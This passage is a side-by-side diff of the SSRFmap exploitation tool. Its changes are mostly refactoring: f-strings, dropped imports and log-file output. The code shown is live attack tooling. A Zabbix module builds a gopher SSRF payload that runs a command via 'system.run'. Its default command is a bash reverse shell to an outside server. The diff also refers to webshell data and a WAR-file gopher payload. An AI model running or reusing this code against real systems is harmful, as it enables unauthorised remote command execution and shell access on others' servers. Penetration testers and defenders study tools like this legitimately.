return webshell_data return webshell_data
def url_encode_all(self, string): def url_encode_all(self, string):
return "".join("%{0:0>2}".format(format(ord(char), "x")) for char in string) return "".join([f"%{ord(char):0>2x}" for char in string])
def build_gopher_payload(self): def build_gopher_payload(self):
warfile = "" warfile = ""

4
modules/zabbix.py
View File

@ -14,7 +14,7 @@ class exploit():
cmd = "bash -i >& /dev/tcp/SERVER_HOST/SERVER_PORT 0>&1" cmd = "bash -i >& /dev/tcp/SERVER_HOST/SERVER_PORT 0>&1"
def __init__(self, requester, args): def __init__(self, requester, args):
logging.info("Module '{}' launched !".format(name)) logging.info(f"Module '{name}' launched !")
cmd = input("Give command to execute (Enter for Reverse Shell): ") cmd = input("Give command to execute (Enter for Reverse Shell): ")
if cmd == "": if cmd == "":
@ -41,7 +41,7 @@ class exploit():
data = "system.run[(" + self.cmd + ");sleep 2s]" data = "system.run[(" + self.cmd + ");sleep 2s]"
payload = wrapper_gopher(data, ip , port) payload = wrapper_gopher(data, ip , port)
logging.info("Generated payload : {}".format(payload)) logging.info(f"Generated payload : {payload}")
# Send the payload # Send the payload
r = requester.do_request(args.param, payload) r = requester.do_request(args.param, payload)

14
ssrfmap.py
View File

@ -1,11 +1,9 @@
#!/usr/bin/python #!/usr/bin/python
from datetime import datetime
from core.ssrf import SSRF from core.ssrf import SSRF
import requests
import argparse import argparse
import logging import logging
import urllib3 import urllib3
import re
def display_banner(): def display_banner():
print(" _____ _________________ ") print(" _____ _________________ ")
@ -50,7 +48,15 @@ if __name__ == "__main__":
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# enable custom logging # enable custom logging
logging.basicConfig(level=logging.INFO, format='[%(levelname)s]:%(message)s') logging.basicConfig(
level=logging.INFO,
format="[%(levelname)s]:%(message)s",
handlers=[
logging.FileHandler("SSRFmap.log", mode='w'),
logging.StreamHandler()
]
)
logging.addLevelName( logging.WARNING, "\033[1;31m%s\033[1;0m" % logging.getLevelName(logging.WARNING)) logging.addLevelName( logging.WARNING, "\033[1;31m%s\033[1;0m" % logging.getLevelName(logging.WARNING))
logging.addLevelName( logging.ERROR, "\033[1;41m%s\033[1;0m" % logging.getLevelName(logging.ERROR)) logging.addLevelName( logging.ERROR, "\033[1;41m%s\033[1;0m" % logging.getLevelName(logging.ERROR))
display_banner() display_banner()